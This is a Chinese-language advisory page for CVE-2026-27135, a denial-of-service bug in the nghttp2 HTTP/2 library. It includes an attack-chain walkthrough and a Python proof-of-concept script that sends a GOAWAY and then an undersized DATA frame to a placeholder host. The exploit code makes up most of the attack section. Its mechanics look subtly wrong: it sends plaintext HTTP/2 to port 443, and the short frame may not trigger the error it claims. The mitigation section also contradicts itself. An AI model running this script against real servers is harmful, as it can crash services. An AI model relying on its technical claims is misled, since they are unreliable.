CVE-2026-27135 nghttp2会话终止后状态验证缺失导致断言失败

漏洞信息

漏洞编号

CVE-2026-27135

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

nghttp2

漏洞概述

nghttp2是一个用C语言实现的HTTP/2协议库。在1.68.1之前的版本中，当应用程序调用公共API函数nghttp2_session_terminate_session或nghttp2_session_terminate_session2时，nghttp2库会停止读取传入数据。这些API也可能由库内部在检测到连接错误情况时调用。由于缺少内部状态验证，库在调用这些终止API后仍会继续读取剩余数据。当接收到导致FRAME_SIZE_ERROR的畸形帧时，会触发断言失败（assertion failure），从而造成程序崩溃。该漏洞可被远程攻击者利用，通过发送特定的畸形HTTP/2帧来触发受影响应用程序的拒绝服务条件。nghttp2 v1.68.1版本通过添加缺失的状态验证来避免断言失败。目前没有已知的临时缓解措施。

技术细节

该漏洞的根本原因在于nghttp2库在调用nghttp2_session_terminate_session或nghttp2_session_terminate_session2后，虽然停止了处理新请求，但未正确更新内部状态机。具体问题如下：

1. 当应用调用终止会话API时，库应设置一个内部标志位来阻止进一步处理帧。

2. 缺少的状态验证导致库继续从网络缓冲区读取数据。

3. 攻击者可发送一个合法的会话终止请求后，紧接着发送一个畸形帧（frame），该帧的帧大小字段与实际数据不符，触发FRAME_SIZE_ERROR。

4. 由于状态验证缺失，库尝试处理该畸形帧，在帧解析逻辑中触发断言失败。

5. 断言失败通常发生在debug模式或启用了断言检查的构建版本中，导致进程异常终止。攻击者无需认证即可通过网络触发此漏洞。

攻击链分析

STEP 1

步骤1

攻击者与目标服务器建立HTTP/2连接，发送有效的连接前缀（PRI * HTTP/2.0）

STEP 2

步骤2

攻击者发送正常的SETTINGS帧建立会话参数

STEP 3

步骤3

攻击者发送GOAWAY帧触发服务器调用nghttp2_session_terminate_session终止会话

STEP 4

步骤4

由于缺少状态验证，服务器继续读取传入数据

STEP 5

步骤5

攻击者发送畸形帧，帧长度字段与实际数据不匹配，触发FRAME_SIZE_ERROR

STEP 6

步骤6

服务器在帧解析逻辑中遇到断言失败，导致进程崩溃，实现拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct

# CVE-2026-27135 PoC - nghttp2 assertion failure after session terminate
# This PoC demonstrates sending a malformed frame after session termination

def create_http2_settings_frame():
    """Create a HTTP/2 SETTINGS frame"""
    frame = b'\x00\x00\x00'  # Length: 0
    frame += b'\x04'  # Type: SETTINGS
    frame += b'\x00'  # Flags: none
    frame += b'\x00\x00\x00\x00'  # Stream ID: 0
    return frame

def create_goaway_frame():
    """Create a GOAWAY frame to terminate session"""
    frame = b'\x00\x00\x08'  # Length: 8
    frame += b'\x07'  # Type: GOAWAY
    frame += b'\x00'  # Flags: none
    frame += b'\x00\x00\x00\x00'  # Stream ID: 0
    frame += struct.pack('>I', 0)  # Last Stream ID
    frame += struct.pack('>I', 0)  # Error code: NO_ERROR
    return frame

def create_malformed_frame():
    """Create a malformed frame that causes FRAME_SIZE_ERROR"""
    # Frame with invalid length field that doesn't match actual data
    frame = b'\x00\x00\xFF'  # Length claims 255 bytes
    frame += b'\x00'  # Type: DATA
    frame += b'\x00'  # Flags
    frame += b'\x00\x00\x00\x01'  # Stream ID: 1
    frame += b'\x00' * 10  # Only 10 bytes of data (not 255)
    return frame

def exploit(target_host, target_port):
    """Send PoC to trigger CVE-2026-27135"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_host, target_port))
    
    # Send HTTP/2 connection preface
    sock.send(b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n')
    
    # Send SETTINGS frame
    sock.send(create_http2_settings_frame())
    
    # Send GOAWAY to terminate session
    sock.send(create_goaway_frame())
    
    # Send malformed frame after session termination
    # This triggers FRAME_SIZE_ERROR and assertion failure
    sock.send(create_malformed_frame())
    
    sock.close()
    print(f"PoC sent to {target_host}:{target_port}")

if __name__ == "__main__":
    exploit("target.example.com", 443)

影响范围

nghttp2 < 1.68.1

防御指南

临时缓解措施

目前没有有效的临时缓解措施。建议尽快升级到nghttp2 v1.68.1或更高版本。在升级前，可以通过在反向代理层面限制HTTP/2连接时长和帧数量来降低风险，但无法完全消除漏洞。